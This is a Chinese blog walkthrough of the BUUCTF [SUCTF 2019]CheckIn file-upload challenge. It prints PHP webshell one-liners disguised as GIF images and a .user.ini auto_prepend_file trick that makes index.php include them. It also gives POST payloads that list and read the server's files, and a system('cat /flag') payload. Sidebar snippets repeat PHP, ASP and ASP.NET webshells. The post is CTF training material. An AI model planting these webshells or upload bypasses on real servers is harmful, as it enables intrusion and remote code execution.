BUUCTF [SUCTF 2019]CheckIn 1

最新推荐文章于 2023-03-23 13:44:10 发布
最新推荐文章于 2023-03-23 13:44:10 发布
阅读量685 收藏 4
点赞数 4
分类专栏: ctf buuctf 刷题日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45642610/article/details/112741593
版权
ctf 同时被 3 个专栏收录
27 篇文章 3 订阅
订阅专栏
buuctf
26 篇文章 2 订阅
订阅专栏
刷题日记
24 篇文章 2 订阅
订阅专栏

BUUCTF [SUCTF 2019]CheckIn 1

在这里插入图片描述
文件包含,一句话木马上传。
直接上传一句话木马<?php eval($_POST['a']);?>
在这里插入图片描述
在这里插入图片描述
非法后缀
那就改后缀绕过,通常有phtml php3 php4 php5 Php php (空格) php pphphp
都试试,都不行。
这时候可以用图片上传。
在一个文件夹中随便复制粘贴来一张照片,创建一个txt文本,输入

GIF89a
<script language=php>eval($_POST['a']);</script>

因为就算是png,jpg等图片类型,还会检查文件内容头,所以用GIF89a
在这里插入图片描述
用script是因为过滤了<?
![在这里插入图片描述](https://img-blog.csdnimg.cn/2021011714232512.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY0MjYxMA==,size_16,color_FFFFFF,t_70
改后缀名为png,上传
(如果随便用一个图片在命令提示符里输入copy xx.png/b + xx.php/a script_a.png再上传script_a.png会报<?错,因为图片转码后含有<?用burp抓包可见)

在这里插入图片描述

your dir....是你上传在后台的目录路径
your file是该目录下有什么文件,有index.php 和 12.png
试试用蚁剑连接buuoj.cn/uploads/261fb642ce1427b99b76a1627f2a8907/12.png
连不上(why?)。试试用网页post,不行。因为绝大多数web服务器,都不允许静态文件响应POST请求。
在这里插入图片描述

这时index.php就有用了。
当服务器给后台返回php页面时,会按照一个php设置规定来返回页面
在这里插入图片描述
.user.ini可以在客户端规定这个设置。当我们访问index.php时,这个index.php会自动包含.user.ini,而我们设置这个配置文件,就可以插入后门或其他操作。具体参考user.ini文件构成的PHP后门
新建txt,输入

GIF89a
auto_prepend_file=12.png

改后缀名为.user.ini
在这里插入图片描述
在这里插入图片描述
访问.buuoj.cn/uploads/261fb642ce1427b99b76a1627f2a8907/index.php
让index.php包含12.png,用蚁剑连接。
在这里插入图片描述
或者在网页上posta=var_dump(scandir("/"));
在这里插入图片描述然后posta=var_dump(file_get_contents("/flag"));
在这里插入图片描述
或者在12.png里的代码换为

GIF89a
<script language='php'>system('cat /flag');</script>

那么访问index.php时会自动显示flag
在这里插入图片描述
参考
[SUCTF 2019]CheckIn
[SUCTF 2019]CheckIn

__byb__
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
php eval一句话木马干啥的,<?php eval($_POST[cmd]);?>一句话木马解读
weixin_39875503的博客
03-09 3647
php网页木马代码,大家可以看下自己的网站里面是不是有这样的代码,注意网站安全用mcafee限制w3wp.exe生成php或者asp文件。并在php.ini中设置一下。php网页木马header("content-Type:text/html;charset=gb2312");if(get_magic_quotes_gpc())foreach($_POSTas$k=>$v)$_POST[...
checkin1:第5组TCSS 360
05-14
【标题】"checkin1:第5组TCSS 360"指的是一个项目或作业提交,可能是在学习或工作中,由一个名为“第5组”的团队完成的。TCSS 360可能是课程名或者项目代号,代表全面的系统安全或软件开发流程。团队成员包括Hari G ...
[SUCTF 2019] Check In 1
c1516175954的博客
03-02 243
[SUCTF 2019]CheckIn1源码审计
[SUCTF 2019]CheckIn 1
m0_73728268的博客
03-23 144
1.函数1exif_imagetype()函数 2.图片🐎的制作 3.user.ini配置文件
BUUCTF——[SUCTF 2019]CheckIn 1
小白一枚多多关注的博客
04-12 1444
这道题应为我的理论限制,所以做了段时间才做出来,这道题它有两个知识前提,第一个就是.user.ini和图片文件头欺骗,这两点在这里有着举足轻重得作用,可以说不了解这两点就大概率得做不出这道题,前置知识点我也没咋理解好,但是这里有一篇写得不错得文章推荐给你门看看: .user.ini得作用以及配置 图片文件头欺骗 前置知识点知道后,那就开始进入环境并且解体了 进入环境后我们会看见一个文件上传得网页,当我一看到这个网页得时候我的第一想法就是文件上传漏洞,当然最后的实验结果也确实是这个漏洞,不过它这里用了一个p
【转】php eval函数用法
zzz的博客
07-06 1111
php eval ()函数 定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 语法 eval(phpcode) 提示 返回语句会立即终止对字符串的计算。 该函数对于在数据
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
glados_checkin
03-25
glados定时签到
checkin-system
05-19
1.安装node.js 安装并启动node.js。 ( ) $ node --version 安装并启动mongoDB。 ( ) $ cd mongodb $ mkdir -p data/db $ bin/mongod --dbpath data/db & 2.克隆gsshop-checkin $ git clone ...
buuctf-web-[SUCTF 2019]CheckIn1
mlws1900的博客
08-11 418
类似的思路就是index.php把1.jpg进行文件包含,1.jpg里面的内容就以php代码执行,于是getshell。,对GIF89a进行检测(exif_imagetype)这题目环境好像有问题一样,做着做着就自动刷新了上传的马,还好截图快。上传文件,上传一个空的jpg文件,发现not image。exif_imagetype -- 判断一个图像的类型。然后先上传user.ini然后上传jpg文件。文件上传漏洞之user.ini留后门。做一个.user.ini文件。进入根目录找到flag即可。
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1512
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
Buuctf(文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2193
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF闯关日记--[SUCTF 2019]CheckIn1()
qq_64201116的博客
05-18 266
这题依旧不是自己做出来的,难过的是没做出来,值得高兴的是掌握了新姿势 进入页面叫你上传文件,肯定就是文件上传漏洞,所以我就开始逐个试 1. 发现.htaccess文件传不了 2. 含有 <? 的文件传不了 首先先解决第一个问题: 一.如果.htaccess文件传不了以我现有的知识只有两个方法: 1.传输.jpg文件,但是内容只含有一句话木马,可以直接连接菜刀 2.依靠CGI解析漏洞,简单来说就是原来访问1.jpg是图片,但是访问1.jpg/.php就是php文件了 但是现有
BUUCTF-CheckIn
m0_47571887的博客
11-09 782
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
CTF--WEB--文件上传
yanfangjie的博客
01-06 3740
前端验证 上传一个一句话木马,扩展名改成允许上传的扩展名。 在把.jpg改成.php 上传的路径在这里 我们可以使用蚁剑来连接 连接成功,得到flag。
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2811
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
BUUCTF_web_CheckIn
silence1_的博客
08-31 2178
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1275
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
上传一句话木马拿shell教程
热门推荐
mad-coding Blog
03-21 1万+
0x00 前言 一句话木马: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 原理: php的...
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值